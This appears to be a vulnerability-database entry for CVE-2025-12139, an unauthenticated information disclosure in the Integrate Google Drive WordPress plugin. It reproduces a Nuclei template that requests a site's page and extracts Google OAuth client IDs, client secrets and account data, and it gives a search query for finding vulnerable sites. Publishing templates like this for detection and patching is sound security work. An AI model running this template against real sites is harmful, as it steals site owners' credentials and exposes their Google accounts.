CVE-2025-12139: Integrate Google Drive <= 1.5.3 - Information Disclosure

日期: 2026-01-08 | 影响软件: Integrate Google Drive | POC: 已公开

漏洞描述

File Manager for Google Drive - Integrate Google Drive with WordPress plugin for WordPress <= 1.5.3 contains sensitive information exposure caused by improper protection of the get_localize_data function, letting unauthenticated attackers extract Google OAuth credentials and account email addresses, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2025-12139

info:
  name: Integrate Google Drive <= 1.5.3 - Information Disclosure
  author: Meysam Bal-afkan
  severity: high
  description: |
    File Manager for Google Drive - Integrate Google Drive with WordPress plugin for WordPress <= 1.5.3 contains sensitive information exposure caused by improper protection of the get_localize_data function, letting unauthenticated attackers extract Google OAuth credentials and account email addresses, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can extract sensitive Google OAuth credentials and email addresses, risking account compromise and data theft.
  remediation: |
    Update to a version later than 1.5.3 or the latest available version.
  reference:
    - https://wordpress.org/plugins/integrate-google-drive/
    - https://github.com/Galaxy-sc/CVE-2025-12139-WordPress-Integrate-Google-Drive-Exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-12139
    epss-score: 0.3428
    epss-percentile: 0.96836
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"/wp-content/plugins/integrate-google-drive"
  tags: cve,cve2025,wordpress,wp-plugin,exposure,token,google-drive

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "var igd")'
          - 'regex("\"clientSecret\":\"[^\"]+\"", body) || regex("\"accounts\":\"[A-Za-z0-9+/=]{20,}\"", body)'
        condition: and

    extractors:
      - type: regex
        name: client-id
        group: 1
        regex:
          - '"clientID":"(.*?)"'

      - type: regex
        name: client-secret
        group: 1
        regex:
          - '"clientSecret":"(.*?)"'

      - type: regex
        name: accounts-base64
        group: 1
        regex:
          - '"accounts":"(.*?)"'
# digest: 4a0a0047304502202b0d59834eae490b492feba4786f4875ced4b6090ec65c2cab0f186b78cd6e77022100f28e46cea239f6ba72466cf1bbd8d15bcdb3492145ac4bedd15ec4e8565c878a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-12139.yaml

相关漏洞推荐